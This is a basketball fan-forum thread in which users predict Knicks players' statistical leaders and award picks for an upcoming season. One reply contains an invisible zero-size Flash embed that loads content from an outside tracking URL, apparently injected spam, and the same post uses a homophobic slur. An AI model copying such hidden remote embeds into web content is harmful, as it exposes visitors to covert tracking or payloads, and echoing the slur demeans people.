Statistic Prognostications

With a young nucleus, who's gonna be the biggest positive surprise?

• Gallo

Votes: 6 54.5%
  • Hill

Votes: 1 9.1%
  • Douglas

• Chandler

Votes: 2 18.2%
  • Lee

Votes: 0 0.0%
  • Curry

• N8

Votes: 0 0.0%

• Total voters

Crazy⑧s

Evacuee
God the off-season blows.

So, this thread entails predicting our leaders in the common statistical categories for next year.

I'm aware that some of our current players might be packing up, but Jesus H I'm so bored.

Here goes....

PPG - N8 Robinson☆ - 21ppg
RPG - David Lee☆ - 13.8rpg
APG - Chris Duhon - 7.6 / Signing Pending - Sessions - 8.9apg
SPG - N8 - 2.4spg
BPG - Chandler 1.6bpg (Cos Darko's lame)
TOPG - N8☆ - 4topg/ Duhon close second.
Technical Fouls - Al Harrington for ring riding.
Double Doubles - Lee☆ obviously, 16.4ppg + 13.8rpg + **** all BPG.

Most all around game including PPG, APG, RPG, BPG & SPG...

Wilson Chandler:

17.6ppg
6.6rpg
4.8apg
1.6bpg
2.2spg

Team MIP:

Gallinari (hopefully)

Team MVP:

Chandler

☆= Could well be on another team by first tip off.

The team I'd like to (realistically) see next year is as follows.

5- Healthy, 17ppg, Eddy Curry (yeah right)
4- Lee
3- Chandler
2- N8
1- Sessions

6- Harrington
-Gallo
-Hill
-Douglas
-Darko
-Duhon

Not exactly the team playoffs are made of, but Jesus it looks better with Sessions @ the 1 and no Hughes.

After recapping, I can't possibly fathom how D' Antoni is gonna run his favored 8 man rotation this year? Hopefully T Douglas gets sufficient PT.

Last edited:

latiger12

Rookie
God the off-season blows.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Lol, yes it does. Chandler gets my vote.

ppg Nate 21
rpg Lee 12+
apg Duhon 7
bpg ???????????
spg Nate 2+

And Chandler for best all round baller. Bout the same stats as what yall said.

team MVP Nate

team MIP Gallinari

team fag Curry

New New York

Quiet Storm
I agree could Chandler in all actuality could lead us in blks, but no way he gets 1.6 per game!

Scoring Leader

nate-robinson.jpg

21ppg-with no new scorers acquired and with the trigger happy Q gone, there is no reason not to think Nate will have another solid scoring season. I got Al Harrington in a close second at like 20 ppg

Rebs:
%2Fmedia%2Flee_400_070122.jpg

11.5 per-no surprises here, Lee has been our best rebounder since Kurt Thomas

Stls.

nate_robinson_earl_watson_breaking_ankles.jpg

1.5 stls per game- a risk taker, lack of defensive fundamentals, and a green light from his coach to go after steals, gives this to Nate Hands down. I got Hughes -if given the minutes- at second

Blks:
medium_darko-blocks-amir-johnson.jpg

between .9 and1.2 blks- The best shotblocker on the team, which reminds me of this quote "In the land of the blind, a one man with one eyed man is king"

Dbl Dbls:

DavidLee_300_061220.jpg

David Lee-led the whole league the previous, common sense suggest he leads at least his team the next year

Ast:

Indiana+Pacers+v+New+York+Knicks+6yWsIaDYj_il.jpg

8.5 apg.-when considering our current roster this is a no briainer unless Toney Douglas turns out to be Mark Jackson and I wouldnt hold me breath on that one.

Surprise player:

fantasy_g_duhon_300.jpg

14 pts 8 ast 1stl 2.5 T.O's-Actually look for Duhon to do a little better statistically this year, remember he had to deal with the shock of being a 10-13 min per game player to a 35 plus min per game player (plus an ever changing roster), he started out fast, but hit a wall. Again last year was his first NBA season as a full-time starter. Look for him to put up more consisteint numbers this year.

M.I.P.:

gallo(2).jpg

there really is only one canidate here and that is Gallo! What I mean is if anyone is more improved than Gallanari they better be an All NBAer, if not thia kid will adopt the bust label. Considering the needs of the team (future PG, Shot Blocking Center, go to scorer) and the players we drafted him ahead of (DJ Augistine,Brook Lopez and Eric Gordon) there is more pressure on Danillo than any other player on this roster. Should he put up 14 ppg 5 rebs 2 ast, and plays in 69 or more games then he will be our most improved player be default

Best All Around/M.V.P

78923883.jpg

I hate to toot my own horn....but toot toot! I called this kid a All Star his first summer league game, he showed flashes of that last year, hit a wall about mid season, but still put up solid numbers 14.5 5 rebs, look for those numbers to climb to about 18 and 6 with a block as Dantoni begins to ask more of him

Last edited:

ANU

Starter
i think douglas will be the big surprise.
ppg-no sharrington
rpg- darko
apg-dudu
spg-chandler
bpg-darko

mip-gallo
mvp-no sharrington
my five would be
duhon
chandler
gallinari
curry
darko

New New York

Quiet Storm
i think douglas will be the big surprise.
ppg-no sharrington
rpg- darko
apg-dudu
spg-chandler
bpg-darko

mip-gallo
mvp-no sharrington
my five would be
duhon
chandler
gallinari
curry
darko

Expecting big things from Darko I see! I would love to see it, but doubt it very much. Although he has made the most of every player he has coached for a full season